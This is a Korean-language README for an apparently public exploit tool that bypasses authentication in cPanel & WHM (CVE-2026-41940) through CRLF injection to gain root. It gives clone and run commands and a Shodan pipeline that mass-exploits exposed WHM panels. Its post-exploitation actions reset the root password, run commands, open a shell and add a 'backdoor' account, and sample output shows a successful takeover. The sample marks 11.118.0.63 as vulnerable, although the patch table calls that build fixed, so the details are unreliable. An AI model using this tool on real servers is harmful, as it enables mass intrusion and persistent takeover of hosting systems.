
cPanel & WHM - 세션 파일 CRLF 주입을 통한 인증 우회
⚡ 인증 없는 루트 – 세션 파일 CRLF 주입 ⚡
"모든 것을 지배하는 하나의 체인."
┌─────────────────────────────────────────────────────────────┐
│ 1단계 ── 사전 인증 세션 쿠키 생성 │
│ 2단계 ── `Authorization` 헤더를 통한 CRLF 주입 │
│ 3단계 ── `do_token_denied` 가젯 실행 (raw → cache) │
│ 4단계 ── JSON API를 통한 WHM 루트 접근 검증 │
└─────────────────────────────────────────────────────────────┘
💥 결과 – 자격 증명 없이 WHM에 대한 완전한 루트 접근 권한 획득.
이 프로젝트는 MIT 라이선스로 배포됩니다 – 자유롭게 사용, 수정, 배포할 수 있지만, 악용하지 마세요 😈.
자세한 내용은 LICENSE 파일을 참조하세요.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
의존성 제로 – Python 3 표준 라이브러리만 필요합니다.
pip,virtualenv또는 그런 것들은 전혀 필요 없습니다.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
대상 시스템을 장악한 후에는 다음을 수행할 수 있습니다:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (전체 WHM 터미널)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
구성:
대상 : 1
스레드 : 10
제한시간: 15초
작업 : 스캔 전용
[10:23:15] [SCAN] 4단계 익스플로잇 체인 시작... https://192.168.1.100:2087
[10:23:15] [INFO] 표준 호스트 이름 감지됨: server.example.com
[10:23:15] [STEP] 1/4단계 — 사전 인증 세션 생성 중...
[10:23:16] [ OK] 1단계: 사전 인증 세션 = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] 2/4단계 — Authorization 헤더를 통한 CRLF 주입 중...
[10:23:17] [ OK] 2단계: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] 3/4단계 — do_token_denied 가젯 실행 중 (raw→cache)...
[10:23:18] [ OK] 3단계: HTTP 401 — do_token_denied 가젯 실행됨
[10:23:18] [STEP] 4/4단계 — WHM 루트 접근 검증 중...
[10:23:18] [INFO] 4단계: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 확인됨 — WHM 루트 접근 권한 획득! (v11.118.0.63 — 취약 버전 확인됨)
[10:23:18] [PWND] 토큰 : /cpsess1234567890
[10:23:18] [PWND] 세션 : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] 버전 : 11.118.0.63
[10:23:18] [PWND] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — 스캔 완료
시간: 3.2초 · 대상: 1
취약 대상 1개 발견
[*] 대상 : https://192.168.1.100:2087
[*] 버전 : 11.118.0.63
[*] 토큰 : /cpsess1234567890
[*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] 세션 : 9a7f8e3d2c1b0a9f
[*] 증거 : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
위 빌드 미만의 모든 버전은 취약합니다.
0xgh057r3c0n – 보안 연구원, 리버스 엔지니어, 그리고 커피 중독자.
GitHub | Twitter
이 도구는 공인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.
컴퓨터 시스템에 대한 무단 접근은 불법입니다. 작성자와 기여자는 이 소프트웨어로 인한 오용 또는 피해에 대해 책임을 지지 않습니다.
책임감 있게 사용하고, 항상 먼저 허가를 받으세요.
🔥 행성을 해킹하되, 합법적으로 하세요. 🔥
| 플래그 | 설명 |
|---|
-u, --url | 단일 대상 URL (예: https://host:2087) |
-l, --list | 한 줄에 URL 하나씩 포함된 파일 |
--hostname | 표준 Host 헤더 재정의 (자동 감지됨) |
-t, --threads | 스레드 수 (기본값: 10) |
--timeout | 제한 시간(초) (기본값: 15) |
--rate-limit | 대상 간 대기 시간(초) |
--action | 사후 익스플로잇: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | 새 루트 비밀번호 (--action passwd와 함께 사용) |
--cmd | OS 명령어 (--action cmd/exec와 함께 사용) |
--new-user | 새 cPanel 사용자 이름 (--action adduser와 함께 사용) |
--new-domain | 새 cPanel 도메인 (--action adduser와 함께 사용) |
-o, --output | 결과를 JSON으로 저장 |
| 브랜치 | 패치된 빌드 | 상태 |
|---|
| 11.110 | 11.110.0.97 | 🛡️ 수정됨 |
| 11.118 | 11.118.0.63 | 🛡️ 수정됨 |
| 11.126 | 11.126.0.54 | 🛡️ 수정됨 |
| 11.132 | 11.132.0.29 | 🛡️ 수정됨 |
| 11.134 | 11.134.0.20 | 🛡️ 수정됨 |
| 11.136 | 11.136.0.5 | 🛡️ 수정됨 |